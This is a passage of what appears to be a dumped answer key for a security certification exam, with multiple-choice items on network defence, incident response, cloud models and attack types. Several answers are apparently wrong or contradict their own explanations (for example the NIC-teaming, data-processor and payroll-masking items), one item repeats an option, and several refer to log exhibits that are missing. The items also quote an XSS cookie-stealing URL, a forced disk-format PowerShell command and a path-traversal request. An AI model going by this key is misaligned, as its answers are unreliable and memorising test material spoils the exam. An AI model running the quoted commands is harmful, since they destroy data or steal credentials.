A security administrator is integrating several segments onto a single network. One of the
segments, which includes legacy devices, presents a significant amount of risk to the network.
Which of the following would allow users to access the legacy devices without compromising
the security of the entire network?
A. NIDS
B. MAC filtering
C. Jump server
D. IPSec
E. NAT gateway
Answer: C
QUESTION 985
Which of the following would a security analyst use to determine if other companies in the same
sector have seen similar malicious activity against their systems?
A. Vulnerability scanner
B. Open-source intelligence
C. Packet capture
D. Threat feeds
Answer: D
QUESTION 986
Which of the following types of disaster recovery plan exercises requires the least interruption to
IT operations?
A. Parallel
B. Full-scale
C. Tabletop
D. Simulation
Answer: C
QUESTION 987
Which of the following disaster recovery sites is the most cost effective to operate?
A. Warm site
B. Cold site
C. Hot site
D. Hybrid site
Answer: B
QUESTION 988
A security operations center wants to implement a solution that can execute files to test for
malicious activity. The solution should provide a report of the files' activity against known threats.
Which of the following should the security operations center implement?
A. the Harvester
B. Nessus
C. Cuckoo
D. Sn1per
Answer: C
QUESTION 989
A security administrator would like to ensure all cloud servers will have software preinstalled for
facilitating vulnerability scanning and continuous monitoring. Which of the following concepts
should the administrator utilize?
A. Provisioning
B. Staging
C. Staging
D. Quality assurance
Answer: A
QUESTION 990
A network architect wants a server to have the ability to retain network availability even if one of
the network switches it is connected to goes down. Which of the following should the architect
implement on the server to achieve this goal?
A. RAID
B. UPS
C. NIC teaming
D. Load balancing
Answer: D
QUESTION 991
A security administrator installed a new web server. The administrator did this to increase the
capacity for an application due to resource exhaustion on another server. Which of the following
algorithms should the administrator use to split the number of the connections on each server in
half?
A. Weighted response
B. Round-robin
C. Least connection
D. Weighted least connection
Answer: B
QUESTION 992
Security analysts have noticed the network becomes flooded with malicious packets at specific
times of the day. Which of the following should the analysts use to investigate this issue?
A. Web metadata
B. Bandwidth monitors
C. System files
D. Correlation dashboards
Answer: D
QUESTION 993
A security administrator performs weekly vulnerability scans on all cloud assets and provides a
detailed report. Which of the following describes the administrator's activities?
A. Continuous deployment
B. Continuous integration
C. Data owners
D. Data processor
Answer: D
QUESTION 994
An attacker is targeting a company. The attacker notices that the company's employees
frequently access a particular website. The attacker decides to infect the website with malware
and hopes the employees' devices will also become infected. Which of the following techniques is
the attacker using?
A. Watering-hole attack
B. Pretexting
C. Typosquatting
D. Impersonation
Answer: A
QUESTION 995
A digital forensics team at a large company is investigating a case in which malicious code was
downloaded over an HTTPS connection and was running in memory, but was never committed to
disk. Which of the following techniques should the team use to obtain a sample of the malware
binary?
A. pcap reassembly
B. SSD snapshot
C. Image volatile memory
D. Extract from checksums
Answer: C
QUESTION 996
A website visitor is required to provide properly formatted information in a specific field on a
website form. Which of the following security measures is most likely used for this mandate?
A. Input validation
B. Code signing
C. SQL injection
D. Form submission
Answer: A
Explanation:
Input validation is a security measure used to ensure that data entered into a form or application
meets specific requirements and is in the correct format. In this scenario, the website requires the
visitor to provide properly formatted information in a specific field on a website form.
Implementing input validation will check the data entered by the user against predefined criteria to
make sure it meets the required format. If the data does not match the expected format, the form
will likely display an error message and prompt the user to correct their input before submission.
This helps prevent certain types of attacks, such as code injection or data manipulation, by
ensuring that only valid and properly formatted data is accepted by the application or website.
QUESTION 997
A technician is setting up a new firewall on a network segment to allow web traffic to the internet
while hardening the network. After the firewall is configured, users receive errors stating the
website could not be located. Which of the following would best correct the issue?
A. Setting an explicit deny to all traffic using port 80 instead of 443
B. Moving the implicit deny from the bottom of the rule set to the top
C. Configuring the first line in the rule set to allow all traffic
D. Ensuring that port 53 has been explicitly allowed in the rule set
Answer: D
QUESTION 998
A systems administrator works for a local hospital and needs to ensure patient data is protected
and secure. Which of the following data classifications should be used to secure patient data?
A. Private
B. Critical
C. Sensitive
D. Public
Answer: C
QUESTION 999
A small business uses kiosks on the sales floor to display product information for customers. A
security team discovers the kiosks use end-of-life operating systems. Which of the following is the
security team most likely to document as a security implication of the current architecture?
A. Patch availability
B. Product software compatibility
C. Ease of recovery
D. Cost of replacement
Answer: A
QUESTION 1000
During a security incident, the security operations team identified sustained network traffic from a
malicious IP address: 10.1.4.9. A security analyst is creating an inbound firewall rule to block the
IP address from accessing the organization's network. Which of the following fulfills this request?
A. access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32
B. access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0
C. access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0
D. access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32
Answer: B
QUESTION 1001
Which of the following is the phase in the incident response process when a security analyst
reviews roles and responsibilities?
A. Preparation
B. Recovery
C. Lessons learned
D. Analysis
Answer: A
QUESTION 1002
An administrator is reviewing a single server's security logs and discovers the following:
Which of the following best describes the action captured in this log file?
A. Brute-force attack
B. Privilege escalation
C. Failed password audit
D. Forgotten password by the user
Answer: A
QUESTION 1003
Which of the following can be used to identify potential attacker activities without affecting
production servers?
A. Honeypot
B. Video surveillance
C. Zero trust
D. Geofencing
Answer: A
QUESTION 1004
A company wants the ability to restrict web access and monitor the websites that employees visit.
Which of the following would best meet these requirements?
A. Internet proxy
B. VPN
C. WAF
D. Firewall
Answer: A
QUESTION 1005
A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon
examining the logs, the analyst identifies a source IP address and blocks that address from
communicating with the network. Even though the analyst is blocking this address, the attack is
still ongoing and coming from a large number of different source IP addresses. Which of the
following describes this type of attack?
A. DDoS
B. Privilege escalation
C. DNS poisoning
D. Buffer overflow
Answer: A
QUESTION 1006
A company needs to centralize its logs to create a baseline and have visibility on its security
events. Which of the following technologies will accomplish this objective?
A. Security information and event management
B. A web application firewall
C. A vulnerability scanner
D. A next-generation firewall
Answer: A
QUESTION 1007
Two organizations are discussing a possible merger. Both organizations' Chief Financial Officers
would like to safely share payroll data with each other to determine if the pay scales for different
roles are similar at both organizations. Which of the following techniques would be best to protect
employee data while allowing the companies to successfully share this information?
A. Pseudo-anonymization
B. Tokenization
C. Data masking
D. Encryption
Answer: C
Explanation:
Tokenization: Tokenization involves replacing sensitive data, such as employee payroll data, with
unique tokens that have no meaningful correlation to the original data. The tokens can be used
for analysis, comparisons, or other operations without exposing the actual payroll data. This
technique ensures the privacy and confidentiality of the employee information while allowing the
organizations to perform their analysis.
QUESTION 1008
A large retail store's network was breached recently, and this news was made public. The store
did not lose any intellectual property, and no customer information was stolen. Although no fines
were incurred as a result, the store lost revenue after the breach. Which of the following is the
most likely reason for this issue?
A. Employee training
B. Leadership changes
C. Reputation damage
D. Identity theft
Answer: C
QUESTION 1009
A government organization is developing an advanced AI defense system. Developers are using
information collected from third-party providers. Analysts are noticing inconsistencies in the
expected progress of the AI learning and attribute the outcome to a recent attack on one of the
suppliers. Which of the following is the most likely reason for the inaccuracy of the system?
A. Improper algorithms security
B. Tainted training data
C. Fileless virus
D. Cryptomalware
Answer: B
QUESTION 1010
A company's help desk has received calls about the wireless network being down and users
being unable to connect to it. The network administrator says all access points are up and
running. One of the help desk technicians notices the affected users are working in a building
near the parking lot. Which of the following is the most likely reason for the outage?
A. Someone near the building is jamming the signal.
B. A user has set up a rogue access point near the building.
C. Someone set up an evil twin access point in the affected area.
D. The APs in the affected area have been unplugged from the network.
Answer: A
QUESTION 1011
Which of the following can best protect against an employee inadvertently installing malware on a
company system?
A. Host-based firewall
B. System isolation
C. Least privilege
D. Application allow list
Answer: C
Explanation:
The principle of least privilege ensures that users are granted only the minimum level of access
necessary to perform their job responsibilities. By implementing least privilege, employees have
restricted access rights and permissions, limiting their ability to install or execute unauthorized
software, including malware.
QUESTION 1012
An information security officer at a credit card transaction company is conducting a framework-mapping
exercise with the internal controls. The company recently established a new office in
Europe. To which of the following frameworks should the security officer map the existing
controls? (Choose two.)
A. ISO
B. PCI DSS
C. SOC
D. GDPR
E. CSA
F. NIST
Answer: BD
QUESTION 1013
A customer called a company's security team to report that all invoices the customer has received
over the last five days from the company appear to have fraudulent banking details. An
investigation into the matter reveals the following:
- The manager of the accounts payable department is using the same password across multiple
external websites and the corporate account.
- One of the websites the manager used recently experienced a data breach.
- The manager's corporate email account was successfully accessed in the last five days by an IP
address located in a foreign country.
Which of the following attacks has most likely been used to compromise the manager's corporate
account?
A. Remote access Trojan
B. Brute-force
C. Dictionary
D. Credential stuffing
E. Password spraying
Answer: D
QUESTION 1014
An organization's corporate offices were destroyed due to a natural disaster, so the organization
is now setting up offices in a temporary work space. Which of the following will the organization
most likely consult?
A. The business continuity plan
B. The risk management plan
C. The communication plan
D. The incident response plan
Answer: A
QUESTION 1015
Security analysts notice a server login from a user who has been on vacation for two weeks. The
analysts confirm that the user did not log in to the system while on vacation. After reviewing
packet capture logs, the analysts notice the following:
Which of the following occurred?
A. A buffer overflow was exploited to gain unauthorized access.
B. The user's account was compromised, and an attacker changed the login credentials.
C. An attacker used a pass-the-hash attack to gain access.
D. An insider threat with username smithJA logged in to the account.
Answer: C
QUESTION 1016
A security analyst is taking part in an evaluation process that analyzes and categorizes threat
actors of real-world events in order to improve the incident response team's process. Which of
the following is the analyst most likely participating in?
A. MITRE ATT&CK
B. Walk-through
C. Red team
D. Purple team
E. TAXII
Answer: A
QUESTION 1017
A network manager wants to protect the company's VPN by multifactor authentication that uses:
- Something you know
- Something you have
- Somewhere you are
Which of the following would accomplish the manager's goal?
A. Domain name, PKI, GeoIP lookup
B. VPN IP address, company ID, partner site
C. Password, authentication token, thumbprint
D. Company URL, TLS certificate, home address
Answer: C
QUESTION 1018
Which of the following terms should be included in a contract to help a company monitor the
ongoing security maturity of a new vendor?
A. A right-to-audit clause allowing for annual security audits
B. Requirements for event logs to be kept for a minimum of 30 days
C. Integration of threat intelligence in the company's AV
D. A data-breach clause requiring disclosure of significant data loss
Answer: A
QUESTION 1019
Which of the following cloud models provides clients with servers, storage, and networks but
nothing else?
A. SaaS
B. PaaS
C. IaaS
D. DaaS
Answer: C
QUESTION 1020
A marketing coordinator is trying to access a social media application on a company laptop but is
getting blocked. The coordinator opens a help desk ticket to report the issue. Which of the
following documents should a security analyst review to determine whether accessing social
media applications on a company device is permitted?
A. Incident response policy
B. Business continuity policy
C. Change management policy
D. Acceptable use policy
Answer: D
QUESTION 1021
Law enforcement officials sent a company a notification that states electronically stored
information and paper documents cannot be destroyed. Which of the following explains this
process?
A. Data breach notification
B. Accountability
C. Legal hold
D. Chain of custody
Answer: C
QUESTION 1022
A company wants to deploy decoy systems alongside production systems in order to entice threat
actors and to learn more about attackers. Which of the following best describes these systems?
A. DNS sinkholes
B. Honeypots
C. Virtual machines
D. Neural networks
Answer: B
QUESTION 1023
A company's help desk received several AV alerts indicating Mimikatz attempted to run on the
remote systems. Several users also reported that the new company flash drives they picked up in
the break room only have 512KB of storage. Which of the following is most likely the cause?
A. The GPO prevents the use of flash drives, which triggers a false positive AV indication and
restricts the drives to only 512KB of storage.
B. The new flash drives need a driver that is being blocked by the AV software because the flash
drives are not on the application's allow list, temporarily restricting the drives to 512KB of storage.
C. The new flash drives are incorrectly partitioned, and the systems are automatically trying to use
an unapproved application to repartition the drives.
D. The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting
to harvest plaintext credentials from memory.
Answer: D
QUESTION 1024
A company has installed badge readers for building access but is finding unauthorized individuals
roaming the hallways. Which of the following is the most likely cause?
A. Shoulder surfing
B. Phishing
C. Tailgating
D. Identity fraud
Answer: C
QUESTION 1025
An organization routes all of its traffic through a VPN. Most users are remote and connect into a
corporate data center that houses confidential information. There is a firewall at the internet
border, followed by a DLP appliance, the VPN server, and the data center itself. Which of the
following is the weakest design element?
A. The DLP appliance should be integrated into a NGFW.
B. Split-tunnel connections can negatively impact the DLP appliance's performance.
C. Encrypted VPN traffic will not be inspected when entering or leaving the network.
D. Adding two hops in the VPN tunnel may slow down remote connections.
Answer: C
QUESTION 1026
Which of the following is the best method for ensuring non-repudiation?
A. SSO
B. Digital certificate
C. Token
D. SSH key
Answer: B
QUESTION 1027
Which of the following methods is the most effective for reducing vulnerabilities?
A. Joining an information-sharing organization
B. Using a scan-patch-scan process
C. Implementing a bug bounty program
D. Patching low-scoring vulnerabilities first
Answer: B
QUESTION 1028
An organization is struggling with scaling issues on its VPN concentrator and internet circuit due
to remote work. The organization is looking for a software solution that will allow it to reduce
traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data
center and monitoring of remote employee internet traffic. Which of the following will help achieve
these objectives?
A. Deploying a SASE solution to remote employees
B. Building a load-balanced VPN solution with redundant internet
C. Purchasing a low-cost SD-WAN solution for VPN traffic
D. Using a cloud provider to create additional VPN concentrators
Answer: A
QUESTION 1029
Which of the following is the best reason to complete an audit in a banking environment?
A. Regulatory requirement
B. Organizational change
C. Self-assessment requirement
D. Service-level requirement
Answer: A
QUESTION 1030
After a recent ransomware attack on a company's system, an administrator reviewed the log files.
Which of the following control types did the administrator use?
A. Compensating
B. Detective
C. Preventive
D. Corrective
Answer: B
QUESTION 1031
A technician needs to apply a high-priority patch to a production system. Which of the following
steps should be taken first?
A. Air gap the system.
B. Move the system to a different network segment.
C. Create a change control request.
D. Apply the patch to the system.
Answer: C
QUESTION 1032
A security analyst reports a company policy violation in a case in which a large amount of
sensitive data is being downloaded after hours from various mobile devices to an external site.
Upon further investigation, the analyst notices that successful login attempts are being conducted
with impossible travel times during the same time periods when the unauthorized downloads are
occurring. The analyst also discovers a couple of WAPs are using the same SSID, but they have
non-standard DHCP configurations and an overlapping channel. Which of the following attacks is
being conducted?
A. Evil twin
B. Jamming
C. DNS poisoning
D. Bluesnarfing
E. DDoS
Answer: A
QUESTION 1033
Several users have opened tickets with the help desk. The help desk has reassigned the tickets
to a security analyst for further review. The security analyst reviews the following metrics:
Which of the following is most likely the result of the security analyst's review?
A. The ISP is dropping outbound connections.
B. The user of the Sales-PC fell for a phishing attack.
C. Corporate PCs have been turned into a botnet.
D. An on-path attack is taking place between PCs and the router.
Answer: C
QUESTION 1034
An engineer needs to deploy a security measure to identify and prevent data tampering within the
enterprise. Which of the following will accomplish this goal?
A. Antivirus
B. IPS
C. FTP
D. FIM
Answer: D
QUESTION 1035
Which of the following mitigation techniques places devices in physically or logically separated
networks and leverages policies to limit the types of communications that are allowed?
A. Host-based firewalls
B. Access control list
C. Port security
D. Least privilege
Answer: A
QUESTION 1036
All security analysts' workstations at a company have network access to a critical server VLAN.
The information security manager wants to further enhance the controls by requiring that all
access to the secure VLAN be authorized only from a given single location. Which of the following
will the information security manager most likely implement?
A. A forward proxy server
B. A jump server
C. A reverse proxy server
D. A stateful firewall server
Answer: B
QUESTION 1037
Which of the following best describes why a company would erase a newly purchased device and
install its own image with an operating system and applications?
A. Installing a new operating system thoroughly tests the equipment
B. Removing unneeded applications reduces the system's attack surface
C. Reimaging a system creates an updated baseline of the computer image
D. Wiping the device allows the company to evaluate its performance
Answer: B
QUESTION 1038
A backdoor was detected on the containerized application environment. The investigation
detected that a zero-day vulnerability was introduced when the latest container image version
was downloaded from a public registry. Which of the following is the best solution to prevent this
type of incident from occurring again?
A. Enforce the use of a controlled trusted source of container images.
B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers.
C. Define a vulnerability scan to assess container images before they are introduced into the
environment.
D. Create a dedicated VPC for the containerized environment.
Answer: A
QUESTION 1039
An external forensics investigator has been hired to investigate a data breach at a large
enterprise with numerous assets. It is known that the breach started in the perimeter network and
moved to the sensitive information, generating multiple logs as the attacker traversed through the
network. Which of the following will best assist with this investigation?
A. Perform a vulnerability scan to identify the weak spots.
B. Use a packet analyzer to investigate the NetFlow traffic.
C. Check the SIEM to review the correlated logs.
D. Require access to the routers to view current sessions.
Answer: C
QUESTION 1040
A Chief Information Security Officer (CISO) needs to create a policy set that meets international
standards for data privacy and sharing. Which of the following should the CISO read and
understand before writing the policies?
A. PCI DSS
B. GDPR
C. NIST
D. ISO 31000
Answer: B
QUESTION 1041
During an internal penetration test, a security analyst identified a network device that had
accepted cleartext authentication and was configured with a default credential. Which of the
following recommendations should the security analyst make to secure this device?
A. Configure SNMPv1.
B. Configure SNMPv2c.
C. Configure SNMPv3.
D. Configure the default community string.
Answer: C
QUESTION 1042
Developers are writing code and merging it into shared repositories several times a day, where it
is tested automatically. Which of the following concepts does this best represent?
A. Functional testing
B. Stored procedures
C. Elasticity
D. Continuous integration
Answer: D
QUESTION 1043
A large financial services firm recently released information regarding a security breach within its
corporate network that began several years before. During the time frame in which the breach
occurred, indicators show an attacker gained administrative access to the network through a file
downloaded from a social media site and subsequently installed it without the user's knowledge.
Since the compromise, the attacker was able to take command and control of the computer
systems anonymously while obtaining sensitive corporate and personal employee information.
Which of the following methods did the attacker most likely use to gain access?
A. A bot
B. A fileless virus
C. A logic bomb
D. A RAT
Answer: D
QUESTION 1044
Recent changes to a company's BYOD policy require all personal mobile devices to use a two-factor
authentication method that is not something you know or have. Which of the following will
meet this requirement?
A. Facial recognition
B. Six-digit PIN
C. PKI certificate
D. Smart card
Answer: A
QUESTION 1045
A critical file server is being upgraded, and the systems administrator must determine which RAID
level the new server will need to achieve parity and handle two simultaneous disk failures. Which
of the following RAID levels meets this requirement?
A. RAID 0+1
B. RAID 2
C. RAID 5
D. RAID 6
Answer: D
QUESTION 1046
A company must ensure sensitive data at rest is rendered unreadable. Which of the following will
the company most likely use?
A. Hashing
B. Tokenization
C. Encryption
D. Segmentation
Answer: C
QUESTION 1047
A security assessment found that several embedded systems are running unsecure protocols.
These systems were purchased two years ago, and the company that developed them is no
longer in business. Which of the following constraints best describes the reason the findings
cannot be remediated?
A. Inability to authenticate
B. Implied trust
C. Lack of computing power
D. Unavailable patch
Answer: D
QUESTION 1048
A security engineer is concerned about using an agent on devices that relies completely on
defined known-bad signatures. The security engineer wants to implement a tool with multiple
components including the ability to track, analyze, and monitor devices without reliance on
definitions alone. Which of the following solutions best fits this use case?
A. EDR
B. DLP
C. NGFW
D. HIPS
Answer: A
QUESTION 1049
A user's login credentials were recently compromised. During the investigation, the security
analyst determined the user input credentials into a pop-up window when prompted to confirm the
username and password. However, the trusted website does not use a pop-up for entering user
credentials. Which of the following attacks occurred?
A. Cross-site scripting
B. SQL injection
C. DNS poisoning
D. Certificate forgery
Answer: A
QUESTION 1050
To reduce costs and overhead, an organization wants to move from an on-premises email
solution to a cloud-based email solution. At this time, no other services will be moving. Which of
the following cloud models would best meet the needs of the organization?
A. MaaS
B. IaaS
C. SaaS
D. PaaS
Answer: C
QUESTION 1051
A software development manager wants to ensure the authenticity of the code created by the
company. Which of the following options is the most appropriate?
A. Testing input validation on the user input fields
B. Performing code signing on company-developed software
C. Performing static code analysis on the software
D. Ensuring secure cookies are used
Answer: B
QUESTION 1052
An organization is having difficulty correlating events from its individual AV, EDR, DLP, SWG,
WAF, MDM, HIPS, and CASB systems. Which of the following is the best way to improve the
situation?
A. Remove expensive systems that generate few alerts.
B. Modify the systems to alert only on critical issues.
C. Utilize a SIEM to centralize logs and dashboards.
D. Implement a new syslog/NetFlow appliance.
Answer: C
QUESTION 1053
A company's end users are reporting that they are unable to reach external websites. After
reviewing the performance data for the DNS servers, the analyst discovers that the CPU, disk, and
memory usage are minimal, but the network interface is flooded with inbound traffic. Network logs
show only a small number of DNS queries sent to this server. Which of the following best
describes what the security analyst is seeing?
A. Concurrent session usage
B. Secure DNS cryptographic downgrade
C. On-path resource consumption
D. Reflected denial of service
Answer: D
QUESTION 1054
An audit identified PII being utilized in the development environment of a critical application. The
Chief Privacy Officer (CPO) is adamant that this data must be removed; however, the developers
are concerned that without real data they cannot perform functionality tests and search for
specific data. Which of the following should a security professional implement to best satisfy both
the CPO's and the development team's requirements?
A. Data purge
B. Data encryption
C. Data masking
D. Data tokenization
Answer: C
QUESTION 1055
A security analyst is investigating a malware incident at a company. The malware is accessing a
command-and-control website at www.comptia.com. All outbound Internet traffic is logged to a
syslog server and stored in /logfiles/messages. Which of the following commands would be best
for the analyst to use on the syslog server to search for recent traffic to the command-and-control
website?
A. head -500 www.comptia.com | grep /logfiles/messages
B. cat /logfiles/messages | tail -500 www.comptia.com
C. tail -500 /logfiles/messages | grep www.comptia.com
D. grep -500 /logfiles/messages | cat www.comptia.com
Answer: C
QUESTION 1056
A systems administrator set up an automated process that checks for vulnerabilities across the
entire environment every morning. Which of the following activities is the systems administrator
conducting?
A. Scanning
B. Alerting
C. Reporting
D. Archiving
Answer: A
QUESTION 1057
An engineer is setting up a VDI environment for a factory location, and the business wants to
deploy a low-cost solution to enable users on the shop floor to log in to the VDI environment
directly. Which of the following should the engineer select to meet these requirements?
A. Laptops
B. Containers
C. Thin clients
D. Workstations
Answer: C
QUESTION 1058
A systems administrator receives the following alert from a file integrity monitoring tool:
The hash of the cmd.exe file has changed.
The systems administrator checks the OS logs and notices that no patches were applied in the
last two months. Which of the following most likely occurred?
A. The end user changed the file permissions.
B. A cryptographic collision was detected.
C. A snapshot of the file system was taken.
D. A rootkit was deployed.
Answer: D
QUESTION 1059
A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible
section of the company's website. The malicious actor posted an entry in an attempt to trick users
into clicking the following:
https://www.comptia.com/contactus/%3Fname%3D%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
Which of the following was most likely observed?
A. DLL injection
B. Session replay
C. SQLi
D. XSS
Answer: D
QUESTION 1060
A company's Chief Information Security Officer (CISO) recently warned the security manager that
the company's Chief Executive Officer (CEO) is planning to publish a controversial opinion article
in a national newspaper, which may result in new cyberattacks. Which of the following would be
best for the security manager to use in a threat model?
A. Hacktivists
B. White-hat hackers
C. Script kiddies
D. Insider threats
Answer: A
QUESTION 1061
Which of the following provides a catalog of security and privacy controls related to the United
States federal information systems?
A. GDPR
B. PCI DSS
C. ISO 27000
D. NIST 800-53
Answer: D
QUESTION 1062
An analyst is concerned about data leaks and wants to restrict access to internet services to
authorized users only. The analyst also wants to control the actions each user can perform on
each service. Which of the following would be the best technology for the analyst to consider
implementing?
A. DLP
B. VPC
C. CASB
D. Content filtering
Answer: C
QUESTION 1063
A grocery store is expressing security and reliability concerns regarding the on-site backup
strategy currently being performed by locally attached disks. The main concerns are the physical
security of the backup media and the durability of the data stored on these devices. Which of the
following is a cost-effective approach to address these concerns?
A. Enhance resiliency by adding a hardware RAID.
B. Move data to a tape library and store the tapes off-site.
C. Install a local network-attached storage.
D. Migrate to a cloud backup solution.
Answer: D
QUESTION 1064
A security engineer needs to recommend a solution to defend against malicious actors misusing
protocols and being allowed through network defenses. Which of the following will the engineer
most likely recommend?
A. A content filter
B. A WAF
C. A next-generation firewall
D. An IDS
Answer: C
QUESTION 1065
A company's legal department drafted sensitive documents in a SaaS application and wants to
ensure the documents cannot be accessed by individuals in high-risk countries. Which of the
following is the most effective way to limit this access?
A. Data masking
B. Encryption
C. Geolocation policy
D. Data sovereignty regulation
Answer: C
QUESTION 1066
An organization suffered numerous multiday power outages at its current location. The Chief
Executive Officer wants to create a disaster recovery strategy to resolve this issue. Which of the
following options offer low-cost solutions? (Choose two.)
A. Warm site
B. Generator
C. Hot site
D. Cold site
E. Cloud backups
F. UPS
Answer: DE
QUESTION 1067
A security analyst is reviewing the following logs:
Which of the following attacks is most likely occurring?
A. Password spraying
B. Account forgery
C. Pass-the-hash
D. Brute-force
Answer: A
QUESTION 1068
A security analyst discovers that one of the web APIs is being abused by an unknown third party.
Logs indicate that the third party is attempting to manipulate the parameters being passed to the
API endpoint. Which of the following solutions would best help to protect against the attack?
A. DLP
B. SIEM
C. NIDS
D. WAF
Answer: D
QUESTION 1069
An application owner reports suspicious activity on an internal financial application from various
internal users within the past 14 days. A security analyst notices the following:
- Financial transactions were occurring during irregular time frames and outside of business hours
by unauthorized users.
- Internal users in question were changing their passwords frequently during that time period.
- A jump box that several domain administrator users use to connect to remote devices was
recently compromised.
- The authentication method used in the environment is NTLM.
Which of the following types of attacks is most likely being used to gain unauthorized access?
A. Pass-the-hash
B. Brute-force
C. Directory traversal
D. Replay
Answer: A
QUESTION 1070
During an incident, an EDR system detects an increase in the number of encrypted outbound
connections from multiple hosts. A firewall is also reporting an increase in outbound connections
that use random high ports. An analyst plans to review the correlated logs to find the source of
the incident. Which of the following tools will best assist the analyst?
A. A vulnerability scanner
B. A NGFW
C. The Windows Event Viewer
D. A SIEM
Answer: D
QUESTION 1071
A company recently suffered a breach in which an attacker was able to access the internal mail
servers and directly access several user inboxes. A large number of email messages were later
posted online. Which of the following would best prevent email contents from being released
should another breach occur?
A. Implement S/MIME to encrypt the emails at rest.
B. Enable full disk encryption on the mail servers.
C. Use digital certificates when accessing email via the web.
D. Configure web traffic to only use TLS-enabled channels.
Answer: A
QUESTION 1072
A company hired a consultant to perform an offensive security assessment covering penetration
testing and social engineering. Which of the following teams will conduct this assessment
activity?
A. White
B. Purple
C. Blue
D. Red
Answer: D
QUESTION 1073
Which of the following exercises should an organization use to improve its incident response
process?
A. Tabletop
B. Replication
C. Failover
D. Recovery
Answer: A
QUESTION 1074
An attacker is attempting to harvest user credentials on a client's website. A security analyst
notices multiple attempts of random usernames and passwords. When the analyst types in a
random username and password, the logon screen displays the following message:
The username you entered does not exist.
Which of the following should the analyst recommend be enabled?
A. Input validation
B. Obfuscation
C. Error handling
D. Username lockout
Answer: C
QUESTION 1075
An organization disabled unneeded services and placed a firewall in front of a business-critical
legacy system. Which of the following best describes the actions taken by the organization?
A. Exception
B. Segmentation
C. Risk transfer
D. Compensating controls
Answer: D
QUESTION 1076
Which of the following describes the ability of code to target a hypervisor from inside a guest OS?
A. Fog computing
B. VM escape
C. Software-defined networking
D. Image forgery
E. Container breakout
Answer: B
QUESTION 1077
A local server recently crashed and the team is attempting to restore the server from a backup.
During the restore process, the team notices the file size of each daily backup is large and will run
out of space at the current rate. The current solution appears to do a full backup every night.
Which of the following would use the least amount of storage space for backups?
A. A weekly, incremental backup with daily differential backups
B. A weekly, full backup with daily snapshot backups
C. A weekly, full backup with daily differential backups
D. A weekly, full backup with daily incremental backups
Answer: D
QUESTION 1078
A security analyst discovers several jpg photos from a cellular phone during a forensics
investigation involving a compromised system. The analyst runs a forensics tool to gather file
metadata. Which of the following would be part of the images if all the metadata is still intact?
A. The GPS location
B. When the file was deleted
C. The total number of print jobs
D. The number of copies made
Answer: A
QUESTION 1079
A financial analyst is expecting an email containing sensitive information from a client. When the
email arrives the analyst receives an error and is unable to open the encrypted message. Which
of the following is the most likely cause of the issue?
A. The S/MIME plug-in is not enabled
B. The SSL certificate has expired
C. Secure IMAP was not implemented
D. POP3S is not supported
Answer: A
QUESTION 1080
A company develops a complex platform that is composed of a single application. After several
issues with upgrades, the systems administrator recommends breaking down the application into
unique, independent modules. Which of the following best identifies the systems administrator's
recommendation?
A. Virtualization
B. Serverless
C. Microservices
D. API gateway
Answer: C
QUESTION 1081
Which of the following would be the best way to block unknown programs from executing?
A. Access control list
B. Application allow list
C. Host-based firewall
D. DLP solution
Answer: B
QUESTION 1082
A company is planning to install a guest wireless network so visitors will be able to access the
internet. The stakeholders want the network to be easy to connect to so time is not wasted during
meetings. The WAPs are configured so that power levels and antennas cover only the
conference rooms where visitors will attend meetings. Which of the following would best protect
the company's internal wireless network against visitors accessing company resources?
A. Configure the guest wireless network to be on a separate VLAN from the company's internal
wireless network.
B. Change the password for the guest wireless network every month.
C. Decrease the power levels of the access points for the guest wireless network.
D. Enable WPA2 using 802.1X for logging on to the guest wireless network.
Answer: A
QUESTION 1083
An organization relies on third-party videoconferencing to conduct daily business. Recent security
changes now require all remote workers to utilize a VPN to corporate resources. Which of the
following would best maintain high-quality videoconferencing while minimizing latency when
connected to the VPN?
A. Using geographic diversity to have VPN terminators closer to end users
B. Utilizing split tunneling so only traffic for corporate resources is encrypted
C. Purchasing higher bandwidth connections to meet the increased demand
D. Configuring QoS properly on the VPN accelerators
Answer: B
QUESTION 1084
A security analyst is scanning a company's public network and discovers a host is running a
remote desktop that can be used to access the production network. Which of the following
changes should the security analyst recommend?
A. Changing the remote desktop port to a non-standard number
B. Setting up a VPN and placing the jump server inside the firewall
C. Using a proxy for web connections from the remote desktop server
D. Connecting the remote server to the domain and increasing the password length
Answer: B
QUESTION 1085
A company recently experienced a major breach. An investigation concludes that customer credit
card data was stolen and exfiltrated through a dedicated business partner connection to a vendor,
who is not held to the same security control standards. Which of the following is the most likely
source of the breach?
A. Side channel
B. Supply chain
C. Cryptographic downgrade
D. Malware
Answer: B
QUESTION 1086
A company would like to provide flexibility for employees on device preference. However, the
company is concerned about supporting too many different types of hardware. Which of the
following deployment models will provide the needed flexibility with the greatest amount of control
and security over company data and infrastructure?
A. BYOD
B. VDI
C. COPE
D. CYOD
Answer: B
QUESTION 1087
Which of the following threat actors is most likely to be motivated by ideology?
A. Business competitor
B. Hacktivist
C. Criminal syndicate
D. Script kiddie
E. Disgruntled employee
Answer: B
QUESTION 1088
A user would like to install software and features that are not available with a mobile device's
default software. Which of the following would allow the user to install unauthorized software and
enable new features?
A. SQLi
B. Cross-site scripting
C. Jailbreaking
D. Side loading
Answer: C
QUESTION 1089
A user downloaded an extension for a browser and the user's device later became infected. The
analyst who is investigating the incident saw various logs where the attacker was hiding activity
by deleting data. The following was observed running:
New-Partition -DiskNumber 2 -UseMaximumSize -AssignDriveLetter C | Format-Volume -DriveLetter C -FileSystemLabel "New" -FileSystem NTFS -Full -Force -Confirm:$false |
Which of the following is the malware using to execute the attack?
A. PowerShell
B. Python
C. Bash
D. Macros
Answer: A
QUESTION 1090
An organization recently acquired an ISO 27001 certification. Which of the following would most
likely be considered a benefit of this certification?
A. It allows for the sharing of digital forensics data across organizations.
B. It provides insurance in case of a data breach.
C. It provides complimentary training and certification resources to IT security staff.
D. It certifies the organization can work with foreign entities that require a security clearance.
E. It assures customers that the organization meets security standards.
Answer: E
QUESTION 1091
A junior security analyst is reviewing web server logs and identifies the following pattern in the log
file:
http://comptia.org/../../../etc/passwd
